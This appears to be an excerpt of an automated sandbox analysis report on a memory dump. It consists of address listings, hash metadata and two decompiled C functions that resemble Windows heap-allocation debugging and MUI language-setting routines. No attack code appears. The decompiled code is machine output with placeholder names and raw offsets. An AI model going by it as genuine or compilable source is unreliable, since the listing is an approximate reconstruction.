                                  0x019020b3
                                  0x019020b9
                                  0x019020b9
                                  0x018ba45d
                                  0x018ba460
                                  0x018ba464
                                  0x018ba466
                                  0x018ba46b
                                  0x018ba46f
                                  0x018ba471
                                  0x018ba471
                                  0x018ba471
                                  0x018ba474
                                  0x018ba479
                                  0x018ba47d
                                  0x018ba47f
                                  0x01902229
                                  0x0190222f
                                  0x018ba3c8
                                  0x018ba3c8
                                  0x018ba3ca
                                  0x018ba3ca
                                  0x00000000
                                  0x018ba3ca
                                  0x01902235
                                  0x0190223a
                                  0x0190223a
                                  0x00000000
                                  0x00000000
                                  0x01902240
                                  0x01902246
                                  0x0190224a
                                  0x01902269
                                  0x0190226e
                                  0x0190224c
                                  0x01902261
                                  0x01902266
                                  0x01902274
                                  0x01902279
                                  0x0190227e
                                  0x01902286
                                  0x01902288
                                  0x0190228d
                                  0x0190228d
                                  0x01902292
                                  0x01902292
                                  0x01902295
                                  0x01902295
                                  0x00000000
                                  0x01902295
                                  0x018ba485
                                  0x018ba489
                                  0x018ba48b
                                  0x018ba48f
                                  0x018ba493
                                  0x018ba497
                                  0x018ba49b
                                  0x018ba4bb
                                  0x018ba4bb
                                  0x018ba4bd
                                  0x018ba4ff
                                  0x018ba4ff
                                  0x018ba501
                                  0x018ba505
                                  0x018ba50f
                                  0x018ba517
                                  0x018ba51b
                                  0x018ba527
                                  0x018ba52b
                                  0x01902182
                                  0x01902185
                                  0x01902193
                                  0x01902199
                                  0x01902199
                                  0x018ba531
                                  0x018ba535
                                  0x018ba538
                                  0x018ba548
                                  0x018ba54b
                                  0x018ba54d
                                  0x018ba553
                                  0x018ba559
                                  0x01902100
                                  0x01902103
                                  0x01902109
                                  0x0190210f
                                  0x01902112
                                  0x01902131
                                  0x01902136
                                  0x01902114
                                  0x01902129
                                  0x0190212e
                                  0x0190213c
                                  0x01902141
                                  0x01902147
                                  0x0190214d
                                  0x01902151
                                  0x01902154
                                  0x01902154
                                  0x01902159
                                  0x01902159
                                  0x01902103
                                  0x018ba55f
                                  0x018ba562
                                  0x018ba565
                                  0x018ba567
                                  0x01902162
                                  0x018ba56d
                                  0x018ba574
                                  0x018ba575
                                  0x018ba579
                                  0x018ba57e
                                  0x01902169
                                  0x0190216a
                                  0x01902170
                                  0x01902175
                                  0x01902179
                                  0x01902179
                                  0x018ba57e
                                  0x018ba584
                                  0x018ba58f
                                  0x018ba58f
                                  0x018ba52b
                                  0x018ba5ad
                                  0x018ba5bc
                                  0x018ba5c1
                                  0x018ba5c6
                                  0x018ba5cb
                                  0x018ba5cd
                                  0x019021a9
                                  0x018ba5d3
                                  0x018ba5d3
                                  0x018ba5d3
                                  0x018ba5d5
                                  0x018ba5d8
                                  0x019021b3
                                  0x019021bc
                                  0x019021c2
                                  0x019021cd
                                  0x019021cf
                                  0x019021da
                                  0x019021da
                                  0x019021da
                                  0x019021f7
                                  0x019021f7
                                  0x019021c2
                                  0x018ba5de
                                  0x018ba5e3
                                  0x018ba5e8
                                  0x018ba5ea
                                  0x0190220a
                                  0x018ba5f0
                                  0x018ba5f0
                                  0x018ba5f0
                                  0x018ba5f2
                                  0x018ba5f5
                                  0x01902219
                                  0x0190221b
                                  0x0190208c
                                  0x0190208c
                                  0x0190208c
                                  0x01902095
                                  0x01902096
                                  0x01902097
                                  0x01902098
                                  0x019020a4
                                  0x019020a5
                                  0x019020a9
                                  0x019020a9
                                  0x00000000
                                  0x018ba5f5
                                  0x018ba4bf
                                  0x018ba4d3
                                  0x018ba4d8
                                  0x018ba4da
                                  0x01901ede
                                  0x01901ede
                                  0x01901ee4
                                  0x01901ee9
                                  0x00000000
                                  0x00000000
                                  0x01901f07
                                  0x00000000
                                  0x01901f07
                                  0x018ba4e0
                                  0x018ba4e5
                                  0x018ba4e7
                                  0x019020cb
                                  0x018ba4ed
                                  0x018ba4ed
                                  0x018ba4ed
                                  0x018ba4f2
                                  0x018ba4f5
                                  0x019020d5
                                  0x019020de
                                  0x019020e4
                                  0x019020f6
                                  0x019020f6
                                  0x019020e4
                                  0x018ba4fb
                                  0x00000000
                                  0x018ba4fb
                                  0x018ba4a1
                                  0x018ba4a4
                                  0x018ba4a8
                                  0x00000000
                                  0x00000000
                                  0x018ba4aa
                                  0x018ba4ac
                                  0x00000000
                                  0x00000000
                                  0x018ba4b2
                                  0x018ba4b5
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x018ba4b5
                                  0x018ba43a
                                  0x018ba340
                                  0x018ba346
                                  0x018ba600
                                  0x00000000
                                  0x018ba600
                                  0x018ba34f
                                  0x018ba351
                                  0x018ba358
                                  0x018ba3c6
                                  0x00000000
                                  0x018ba371
                                  0x018ba37a
                                  0x018ba37f
                                  0x018ba382
                                  0x018ba384
                                  0x018ba394
                                  0x00000000
                                  0x018ba396
                                  0x018ba399
                                  0x018ba3a7
                                  0x018ba3b0
                                  0x018ba3b4
                                  0x018ba3bb
                                  0x018ba3d2
                                  0x018ba3da
                                  0x018ba3df
                                  0x018ba3e1
                                  0x018ba3e5
                                  0x018ba3ea
                                  0x018ba3f0
                                  0x018ba3f0
                                  0x018ba3e1
                                  0x00000000
                                  0x018ba3bb
                                  0x018ba394

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 0-523794902
                                  • Opcode ID: e9073c5d850cfde3e714ac231b4fe60a2cae2f9d2f2036d6d7ee36648e194f98
                                  • Instruction ID: a73b57b41efe6ac2a772ec2487c23d62f53a79a5e80850f1106dfc7083642067
                                  • Opcode Fuzzy Hash: e9073c5d850cfde3e714ac231b4fe60a2cae2f9d2f2036d6d7ee36648e194f98
                                  • Instruction Fuzzy Hash: E742E0316087419FD71ADF28C4C4A6ABBE5FF88704F08496DE58ACB391D734DA85CB52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 01952D82, Relevance: 7.7, Strings: 6, Instructions: 228COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E01952D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t83;
				signed char _t89;
				intOrPtr _t90;
				signed char _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				short* _t130;
				short _t131;
				signed int _t148;
				intOrPtr _t149;
				signed int* _t154;
				short* _t165;
				signed int _t171;
				void* _t182;

				_push(0x44);
				_push(0x1970e80);
				E018ED0E8(__ebx, __edi, __esi);
				_t177 = __edx;
				_t181 = __ecx;
				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
				 *((char*)(_t182 - 0x1d)) = 0;
				 *(_t182 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t182 - 4)) = 0;
					 *((intOrPtr*)(_t182 - 4)) = 1;
					_t83 = E018940E1("RtlAllocateHeap");
					__eflags = _t83;
					if(_t83 == 0) {
						L48:
						 *(_t182 - 0x24) = 0;
						L49:
						 *((intOrPtr*)(_t182 - 4)) = 0;
						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
						E019530C4();
						goto L50;
					}
					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
					 *(_t182 - 0x28) = _t89;
					 *(_t182 - 0x3c) = _t89;
					_t177 =  *(_t182 + 8);
					__eflags = _t177;
					if(_t177 == 0) {
						_t171 = 1;
						__eflags = 1;
					} else {
						_t171 = _t177;
					}
					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
					__eflags = _t148 - 0x10;
					if(_t148 < 0x10) {
						_t148 = 0x10;
					}
					_t149 = _t148 + 8;
					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
					__eflags = _t149 - _t177;
					if(_t149 < _t177) {
						L44:
						_t90 =  *[fs:0x30];
						__eflags =  *(_t90 + 0xc);
						if( *(_t90 + 0xc) == 0) {
							_push("HEAP: ");
							E0189B150();
						} else {
							E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t181 + 0x78)));
						E0189B150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
						goto L48;
					} else {
						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
							goto L44;
						}
						__eflags = _t89 & 0x00000001;
						if((_t89 & 0x00000001) != 0) {
							_t178 =  *(_t182 - 0x28);
						} else {
							E018AEEF0( *((intOrPtr*)(_t181 + 0xc8)));
							 *((char*)(_t182 - 0x1d)) = 1;
							_t178 =  *(_t182 - 0x28) | 0x00000001;
							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
						}
						E01954496(_t181, 0);
						_t177 = L018B4620(_t181, _t181, _t178,  *(_t182 + 8));
						 *(_t182 - 0x24) = _t177;
						_t173 = 1;
						E019549A4(_t181);
						__eflags = _t177;
						if(_t177 == 0) {
							goto L49;
						} else {
							_t177 = _t177 + 0xfffffff8;
							__eflags =  *((char*)(_t177 + 7)) - 5;
							if( *((char*)(_t177 + 7)) == 5) {
								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
								__eflags = _t177;
							}
							_t154 = _t177;
							 *(_t182 - 0x40) = _t177;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
								if(__eflags != 0) {
									_push(_t154);
									_t173 = _t177;
									E0194FA2B(0, _t181, _t177, _t177, _t181, __eflags);
								}
							}
							__eflags =  *(_t177 + 2) & 0x00000002;
							if(( *(_t177 + 2) & 0x00000002) == 0) {
								_t101 =  *(_t177 + 3);
								 *(_t182 - 0x29) = _t101;
								_t102 = _t101 & 0x000000ff;
							} else {
								_t130 = E01891F5B(_t177);
								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
								__eflags =  *(_t181 + 0x40) & 0x08000000;
								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
									 *_t130 = 0;
								} else {
									_t131 = E018C16C7(1, _t173);
									_t165 =  *((intOrPtr*)(_t182 - 0x30));
									 *_t165 = _t131;
									_t130 = _t165;
								}
								_t102 =  *(_t130 + 2) & 0x0000ffff;
							}
							 *(_t182 - 0x34) = _t102;
							 *(_t182 - 0x28) = _t102;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *_t177;
							}
							__eflags =  *(_t181 + 0x40) & 0x20000000;
							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E01954496(_t181, 0);
							}
							__eflags =  *(_t182 - 0x24) -  *0x1986360; // 0x0
							_t104 =  *[fs:0x30];
							if(__eflags != 0) {
								_t105 =  *(_t104 + 0x68);
								 *(_t182 - 0x4c) = _t105;
								__eflags = _t105 & 0x00000800;
								if((_t105 & 0x00000800) == 0) {
									goto L49;
								}
								_t106 =  *(_t182 - 0x34);
								__eflags = _t106;
								if(_t106 == 0) {
									goto L49;
								}
								__eflags = _t106 -  *0x1986364; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0x1986366; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								_t108 =  *[fs:0x30];
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E0189B150();
								} else {
									E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E0193D455(_t181,  *(_t182 - 0x28)));
								_push( *(_t182 + 8));
								E0189B150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
								goto L34;
							} else {
								__eflags =  *(_t104 + 0xc);
								if( *(_t104 + 0xc) == 0) {
									_push("HEAP: ");
									E0189B150();
								} else {
									E0189B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t182 + 8));
								E0189B150("Just allocated block at %p for %Ix bytes\n",  *0x1986360);
								L34:
								_t112 =  *[fs:0x30];
								__eflags =  *((char*)(_t112 + 2));
								if( *((char*)(_t112 + 2)) != 0) {
									 *0x1986378 = 1;
									 *0x19860c0 = 0;
									asm("int3");
									 *0x1986378 = 0;
								}
								goto L49;
							}
						}
					}
				} else {
					_t181 =  *0x1985708; // 0x0
					 *0x198b1e0(__ecx, __edx,  *(_t182 + 8));
					 *_t181();
					L50:
					return E018ED130(0, _t177, _t181);
				}
			}





















                                  0x01952d82
                                  0x01952d84
                                  0x01952d89
                                  0x01952d8e
                                  0x01952d90
                                  0x01952d92
                                  0x01952d97
                                  0x01952d9a
                                  0x01952da4
                                  0x01952dc0
                                  0x01952dc3
                                  0x01952dd1
                                  0x01952dd6
                                  0x01952dd8
                                  0x019530a7
                                  0x019530a7
                                  0x019530aa
                                  0x019530aa
                                  0x019530ad
                                  0x019530b4
                                  0x00000000
                                  0x019530b9
                                  0x01952de3
                                  0x01952de8
                                  0x01952deb
                                  0x01952dee
                                  0x01952df1
                                  0x01952df3
                                  0x01952dfb
                                  0x01952dfb
                                  0x01952df5
                                  0x01952df5
                                  0x01952df5
                                  0x01952e04
                                  0x01952e0a
                                  0x01952e0d
                                  0x01952e11
                                  0x01952e11
                                  0x01952e12
                                  0x01952e15
                                  0x01952e18
                                  0x01952e1a
                                  0x01953027
                                  0x01953027
                                  0x0195302d
                                  0x01953030
                                  0x0195304f
                                  0x01953054
                                  0x01953032
                                  0x01953047
                                  0x0195304c
                                  0x0195305a
                                  0x01953063
                                  0x00000000
                                  0x01952e20
                                  0x01952e20
                                  0x01952e23
                                  0x00000000
                                  0x00000000
                                  0x01952e29
                                  0x01952e2b
                                  0x01952e47
                                  0x01952e2d
                                  0x01952e33
                                  0x01952e38
                                  0x01952e3f
                                  0x01952e42
                                  0x01952e42
                                  0x01952e4e
                                  0x01952e5d
                                  0x01952e5f
                                  0x01952e62
                                  0x01952e66
                                  0x01952e6b
                                  0x01952e6d
                                  0x00000000
                                  0x01952e73
                                  0x01952e73
                                  0x01952e76
                                  0x01952e7a
                                  0x01952e83
                                  0x01952e83
                                  0x01952e83
                                  0x01952e85
                                  0x01952e87
                                  0x01952e8a
                                  0x01952e8d
                                  0x01952e92
                                  0x01952e9c
                                  0x01952e9f
                                  0x01952ea1
                                  0x01952ea2
                                  0x01952ea6
                                  0x01952ea6
                                  0x01952e9f
                                  0x01952eab
                                  0x01952eaf
                                  0x01952edf
                                  0x01952ee2
                                  0x01952ee5
                                  0x01952eb1
                                  0x01952eb3
                                  0x01952eb8
                                  0x01952ebd
                                  0x01952ec4
                                  0x01952ed6
                                  0x01952ec6
                                  0x01952ec7
                                  0x01952ecc
                                  0x01952ecf
                                  0x01952ed2
                                  0x01952ed2
                                  0x01952ed9
                                  0x01952ed9
                                  0x01952ee8
                                  0x01952eeb
                                  0x01952eef
                                  0x01952ef2
                                  0x01952efe
                                  0x01952f04
                                  0x01952f04
                                  0x01952f04
                                  0x01952f06
                                  0x01952f0d
                                  0x01952f0f
                                  0x01952f13
                                  0x01952f13
                                  0x01952f1b
                                  0x01952f21
                                  0x01952f27
                                  0x01952f95
                                  0x01952f98
                                  0x01952f9b
                                  0x01952fa0
                                  0x00000000
                                  0x00000000
                                  0x01952fa6
                                  0x01952fa9
                                  0x01952fac
                                  0x00000000
                                  0x00000000
                                  0x01952fb2
                                  0x01952fb9
                                  0x00000000
                                  0x00000000
                                  0x01952fc3
                                  0x01952fca
                                  0x00000000
                                  0x00000000
                                  0x01952fd0
                                  0x01952fd6
                                  0x01952fd9
                                  0x01952ff8
                                  0x01952ffd
                                  0x01952fdb
                                  0x01952ff0
                                  0x01952ff5
                                  0x0195300e
                                  0x0195300f
                                  0x0195301a
                                  0x00000000
                                  0x01952f29
                                  0x01952f29
                                  0x01952f2c
                                  0x01952f4b
                                  0x01952f50
                                  0x01952f2e
                                  0x01952f43
                                  0x01952f48
                                  0x01952f56
                                  0x01952f64
                                  0x01952f6c
                                  0x01952f6c
                                  0x01952f72
                                  0x01952f76
                                  0x01952f7c
                                  0x01952f83
                                  0x01952f89
                                  0x01952f8a
                                  0x01952f8a
                                  0x00000000
                                  0x01952f76
                                  0x01952f27
                                  0x01952e6d
                                  0x01952da6
                                  0x01952dab
                                  0x01952db3
                                  0x01952db9
                                  0x019530bc
                                  0x019530c1
                                  0x019530c1

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.293458349.0000000001870000.00000040.00000001.sdmp, Offset: 01870000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                  • API String ID: 0-1745908468
                                  • Opcode ID: b34218882b9d994ca32f6bb0254a15190d6c2cb1d857da4d3101d56bc23561d2
                                  • Instruction ID: 3f2b2946225ca9a3ca7e29b68351fea4f90e956051b750ae0355c15fb25703a5
                                  • Opcode Fuzzy Hash: b34218882b9d994ca32f6bb0254a15190d6c2cb1d857da4d3101d56bc23561d2
                                  • Instruction Fuzzy Hash: DF912131610B41DFDB62DFA8D454AADBBF2FF49B00F18841DE94AAB351C7329A41CB01
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 018A3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 96%
                                  			E018A3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E018A1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E018A1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E018A1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E018A1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E018A1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L018B4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E018DF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E018E1370(_t276, 0x1874e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E018DBB40(0,  &_v68, _t170);
									if(L018A43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E018DBB40(_t257,  &_v68, _t243);
								if(L018A43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E018E1370(_t278, 0x1874e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L018B4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E018DF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E018E1370(_v16, 0x1874e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E018DBB40(_t262,  &_v68, _t244);
								if(L018A43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E018E1370(_t282, 0x1874e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E018DBB40(_t262,  &_v68, _t201);
							if(L018A43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L018B4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E018DF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E018E1370(_t280, 0x1874e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E018DBB40(_t267,  &_v68, _t245);
							if(L018A43C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E018E1370(_t284, 0x1874e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E018DBB40(_t267,  &_v68, _t224);
						if(L018A43C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                  0x018a3d3c
                                  0x018a3d42
                                  0x018a3d44
                                  0x018a3d46
                                  0x018a3d49
                                  0x018a3d4c
                                  0x018a3d4f
                                  0x018a3d52
                                  0x018a3d55
                                  0x018a3d58
                                  0x018a3d5b
                                  0x018a3d5f
                                  0x018a3d61
                                  0x018a3d66
                                  0x018f8213
                                  0x018f8218
                                  0x018a4085
                                  0x018a4088
                                  0x018a408e
                                  0x018a4094
                                  0x018a409a
                                  0x018a40a0
                                  0x018a40a6
                                  0x018a40a9
                                  0x018a40af
                                  0x018a40b6
                                  0x018a40bd
                                  0x018a40bd
                                  0x018a3d83
                                  0x018f821f
                                  0x018f8229
                                  0x018f8238
                                  0x018f8238
                                  0x018f823d
                                  0x018f823d
                                  0x018a3da0
                                  0x018a3daf
                                  0x018a3db5
                                  0x018a3dba
                                  0x018a3dba
                                  0x018a3dd4
                                  0x018a3e94
                                  0x018a3eab
                                  0x018a3f6d
                                  0x018a3f84
                                  0x018a406b
                                  0x018a406b
                                  0x018a406e
                                  0x018a406e
                                  0x018a4070
                                  0x018a4074
                                  0x018f8351
                                  0x018f8351
                                  0x018a407a
                                  0x018a407f
                                  0x018f835d
                                  0x018f8370
                                  0x018f8377
                                  0x018f8379
                                  0x018f837c
                                  0x018f837c
                                  0x018f835d
                                  0x00000000
                                  0x018a407f
                                  0x018a3f8a
                                  0x018a3f8d
                                  0x018a3f90
                                  0x018a3f95
                                  0x018f830d
                                  0x018f830f
                                  0x018a3f9b
                                  0x018a3fac
                                  0x018a3fae
                                  0x018a3fb1
                                  0x018a3fb1
                                  0x018a3fb6
                                  0x018f8317
                                  0x018f831a
                                  0x00000000
                                  0x018a3fbc
                                  0x018a3fc1
                                  0x018a3fc9
                                  0x018a3fd7
                                  0x018a3fda
                                  0x018a3fdd
                                  0x018a4021
                                  0x018a4021
                                  0x018a4029
                                  0x018a4030
                                  0x018a4044
                                  0x018a4046
                                  0x018a4046
                                  0x018a4044
                                  0x018a4049
                                  0x018f8327
                                  0x018f8334
                                  0x018f8339
                                  0x018f833c
                                  0x018a404f
                                  0x018a404f
                                  0x018a404f
                                  0x018a4051
                                  0x018a4056
                                  0x018a4063
                                  0x018a4063
                                  0x018a4068
                                  0x00000000
                                  0x018a4068
                                  0x018a3fdf
                                  0x018a3fe2
                                  0x018a3fe4
                                  0x018a3fe7
                                  0x018a3fef
                                  0x018a4003
                                  0x018a4005
                                  0x018a4005
                                  0x018a400c
                                  0x018a4013
                                  0x018a4016
                                  0x018a4017
                                  0x018a401b
                                  0x018a401e
                                  0x00000000
                                  0x018a401e
                                  0x018a3fb6
                                  0x018a3eb1
                                  0x018a3eb4
                                  0x018a3eb7
                                  0x018a3ebc
                                  0x018f82a9
                                  0x018f82ab
                                  0x018a3ec2
                                  0x018a3ed3
                                  0x018a3ed5
                                  0x018a3ed8
                                  0x018a3ed8
                                  0x018a3edd
                                  0x018f82b3
                                  0x018f82b6
                                  0x00000000
                                  0x018a3ee3
                                  0x018a3ee8
                                  0x018a3eed
                                  0x018a3ef0
                                  0x018a3ef3
                                  0x018a3f02
                                  0x018a3f05
                                  0x018a3f08
                                  0x018f82c0
                                  0x018f82c3
                                  0x018f82c5
                                  0x018f82c8
                                  0x018f82d0
                                  0x018f82e4
                                  0x018f82e6
                                  0x018f82e6
                                  0x018f82ed
                                  0x018f82f4
                                  0x018f82f7
                                  0x018f82f8
                                  0x018f82fc
                                  0x018f82ff
                                  0x018f82ff
                                  0x018a3f0e
                                  0x018a3f11
                                  0x018a3f16
                                  0x018a3f1d
                                  0x018a3f31
                                  0x018f8307
                                  0x018f8307
                                  0x018a3f31
                                  0x018a3f39
                                  0x018a3f48
                                  0x018a3f4d
                                  0x018a3f50
                                  0x018a3f50
                                  0x018a3f53
                                  0x018a3f58
                                  0x018a3f65
                                  0x018a3f65
                                  0x018a3f6a
                                  0x00000000
                                  0x018a3f6a
                                  0x018a3edd
                                  0x018a3dda
                                  0x018a3ddd
                                  0x018a3de0
                                  0x018a3de5
                                  0x018f8245
                                  0x018a3deb
